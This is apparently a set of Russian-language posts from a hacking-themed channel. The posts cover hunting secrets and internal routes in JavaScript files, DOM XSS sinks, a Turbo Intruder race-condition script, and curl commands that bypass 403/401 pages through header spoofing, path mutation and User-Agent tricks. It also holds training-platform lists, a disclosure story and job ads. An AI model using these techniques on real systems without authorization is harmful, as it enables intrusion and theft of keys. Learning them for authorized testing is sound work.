😎 Как анализировать JavaScript-файлы в поисках уязвимостей

JavaScript-файлы — кладезь информации для хакера. В них часто прячутся: API-ключи, токены, внутренние маршруты и многое другое. Разбираемся по шагам:

1. Находим JavaScript-файлы

🔘 DevTools → Network → фильтр JS

🔘 Поиск в HTML: <script src=...>

🔘 Через robots.txt, sitemap.xml — могут быть нестандартные пути

🔘 Массовый сбор:

gau example.com | grep "\.js"
subjs -i example.com

2. Красиво форматируем код

🔘 Сохраняем файл:

curl -s https://example.com/static/app.js -o app.js

🔘 Преобразуем в читаемый вид:

js-beautify app.js -o app_pretty.js

3. Ищем ключи и токены

🔘 Регулярный поиск чувствительных строк:

grep -Ei 'apikey|token|secret|authorization|bearer' app_pretty.js

⚠️ Обратите внимание на: firebaseConfig, AWS.config.update, process.env, window._env_, accessKey, clientSecret

Также можно подключить:

trufflehog --regex --entropy=True --json app_pretty.js

4. Извлекаем внутренние API и маршруты

🔘 Подозрительные запросы:

fetch("/api/internal/user/settings")
axios.post("/admin/config»)

⚠️ Полезные шаблоны:

— /v1/private/, /internal/, /debug/

— /graphql, /admin/, /api/secret

— нестандартные порты: 3000, 5000, 8080

🔘 Используйте LinkFinder:

python3 linkfinder.py -i app.js -o cli

5. Анализируем бизнес-логику

🔘 Примеры опасных конструкций:

if (user.role === 'admin') { ... }       
if (!user.isLoggedIn) { return; } 

🔘 Смотрите, как собираются токены:

headers: {
  Authorization: `Bearer ${localStorage.getItem("jwt")}`
}

6. Ищем DOM-based XSS

🔘 Уязвимые конструкции:

element.innerHTML = location.hash;
document.write(decodeURIComponent(param));

💡 JS-файлы — это раскрытая подноготная фронта. Один пропущенный файл может стоить компании доступа к внутреннему API, админке или ключам.

🐸 Библиотека хакера

#буст

🥹

🐸 Библиотека хакера

#развлекалово

🐍 Как найти уязвимости в Python-коде

В сфере безопасности важно не только искать уязвимости вручную, но и использовать автоматизацию для быстрой оценки рисков. Этот промпт поможет вам проанализировать Python-код на наличие таких уязвимостей, как SQL-инъекции, XSS и других угроз.

Промпт:

Analyze the following Python code for vulnerabilities like SQL injection, XSS, and other security flaws.

Чем полезен:

➡️ Рекомендует безопасные альтернативы и лучшие практики (например, использование подготовленных запросов для предотвращения SQL-инъекций).

➡️ Повышает безопасность кода, минимизируя риски для системы.

Дополнительно можно запросить:

— Подсказки по улучшению работы с библиотеками, такими как sqlite3, pymysql, flask

— Примеры защиты от атак, таких как XSS и CSRF

— Оценку безопасности работы с внешними входными данными

🐸 Библиотека хакера

#буст

💼 Как я обнаружил уязвимость в умной камере и предотвратил утечку данных

Один из наших подписчиков поделился историей:

Недавно при проведении пентеста я столкнулся с уязвимостью в одной популярной модели умной камеры. Во время тестирования я заметил, что она использует незашифрованное соединение для передачи видеофайлов и данных о пользователе. В случае перехвата трафика злоумышленник мог бы получить доступ к видео с камеры, а также к личной информации владельца.

Я немедленно сообщил об этом производителю, и они подтвердили проблему. После наших рекомендаций по улучшению безопасности, камера была обновлена с использованием HTTPS для защиты данных.

❓ А вы сталкивались с подобными уязвимостями в IoT-устройствах? Как решали такие проблемы в вашей компании?

🐸 Библиотека хакера

#междусобойчик

🛠 Фишка инструмента: Turbo Intruder — атаки на race condition за миллисекунды

Когда обычный Intruder или Repeater уже не справляется — в бой идёт Turbo Intruder. Это плагин для Burp Suite, который позволяет отправлять десятки или сотни запросов одновременно, чтобы выявить уязвимости гонки.

Зачем нужно:

➡️ Тестирование race condition (например, двойное списание денег)

➡️ Атаки на лимиты, биллинг, бонусы, бронирование

➡️ Полный контроль: параллельность, тайминги, паузы, кастом логика

➡️ Поддержка HTTP/2 single-packet атак

Как это выглядит:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False)
    for _ in range(30):
        engine.queue(target.req, gate='race')
    engine.openGate('race')  # всё отправляется одновременно

📌 Это создает параллельную волну запросов к одному endpoint. Идеально для атак на гонку состояний.

🐸 Библиотека хакера

#буст

🤦‍♀️

🐸 Библиотека хакера

#развлекалово

🎲 Что мы загадали в ребусе

Подсказка: снаружи вы — просто наблюдатель, ноо один удачный вход — и вы уже управляете всем.

Что за термин зашифрован? Пишите свою версию в комментариях! ✏️

🐸 Библиотека хакера

#междусобойчик

👮‍♀️ Практика для хакера: платформы для отработки навыков

Для прокачки offensive-навыков в боевых условиях — подборка отличных бесплатных площадок, с которых стоит начать:

➡️ Hack The Box (HTB): от простых web-апп до реальных AD-лабораторий. Отлично подходит для подготовки к OSCP.

➡️ TryHackMe — Offensive Path: много практики с подсказками. Пошаговый путь: reconnaissance, exploitation, privilege escalation и др.

➡️ picoCTF — отличный CTF для начинающих от Carnegie Mellon. Есть задачи по реверсу, web, крипте и pwn.

➡️ OverTheWire — Bandit & Narnia: мини-игры в терминале: Linux, бинарки, эксплуатация. Идеально для новичков и практики CLI-навыков.

➡️ CTFlearn: платформа с сотнями CTF-задач: web, stegano, reversing, OSINT и др.

🐸 Библиотека хакера

#свежак

🔐 Задача: применение криптографических токенов

Вы анализируете облачный сервис, где используются криптографические токены.

Перед загрузкой файлы шифруются, а ключи шифрования хранятся в токене, который выдается пользователю при аутентификации.

Для чего в этом случае используется криптографический токен ❓

🐸 Библиотека хакера

#междусобойчик

🤑 Топ-вакансий для хакеров за неделю

Руководитель проектов ИБ — офис (Москва)

Аналитик по информационной безопасности — удаленно (Санкт-Петербург)

Специалист по архитектуре ИБ — удаленно (Нижний Новгород)

Руководитель проектов по ИБ — офис (Москва)

Эксперт по информационной безопасности — даленно (Москва)

➡️ Еще больше топовых вакансий — в нашем канале InfoSec jobs

🐸 Библиотека хакера

#свежак

⭐ Как анализировать 403/401 страницы через bypass-техники

Иногда 403 Forbidden или 401 Unauthorized — это не приговор, а вызов. Эти коды часто скрывают админки, API и чувствительные ресурсы. Вот как их обходят:

1. Смена HTTP-методов

curl -X POST https://target.com/secret
curl -X HEAD https://target.com/admin

📍 Некоторые бэкенды не проверяют права на POST или HEAD.

📍 Полезно для старых API и нестандартных фреймворков.

2. Добавление обходных заголовков

curl -H "X-Original-URL: /admin" https://target.com
curl -H "X-Custom-IP-Authorization: 127.0.0.1" https://target.com/secret

📍 Часто срабатывает, если WAF/бэкенд доверяет заголовкам от прокси.

📍 Работает на старых nginx/apache или при кривых кастомных middleware.

3. Мутации путей и суффиксы

curl https://target.com/admin/
curl https://target.com/admin//
curl https://target.com/admin%2f
curl https://target.com/admin..;/ 

📍 Классика: двойные слеши, URL-энкодинг, суффиксы типа ;, %2e.

📍 Бывает, что /admin/ даёт 403, а /admin// — 200 OK.

4. Удаление или подмена cookies

curl -b "auth=invalid" https://target.com/panel
curl --cookie-jar /dev/null https://target.com/secure

📍 Иногда доступ ограничен только при наличии определённых cookies.

📍Удаление может обойти ограничения.

5. Подмена User-Agent и IP

curl -H "User-Agent: Googlebot" https://target.com
curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/hidden

📍 Много админок открыты для Googlebot, Baiduspider, Yandex.

📍 X-Forwarded-For — один из старейших багов доверия IP.

6. Автоматизация фаззинга

ffuf -w bypass.txt -u https://target.com/FUZZ -mc 200,401,403

📍 Используй словари обхода путей (bypass.txt, raft-large-directories.txt).

📍 Можно тестировать на wildcard-доменах, например admin.target.com.

💡 Лайфхаки:

— Работает особенно хорошо на CDN, старом nginx/apache, poorly configured WAF.

— Комбинируй обход с фаззингом через ffuf, dirsearch, qsreplace.

— Проверяй логику: 403 ≠ реально закрыто. Иногда это просто заглушка от WAF.

🐸 Библиотека хакера

#буст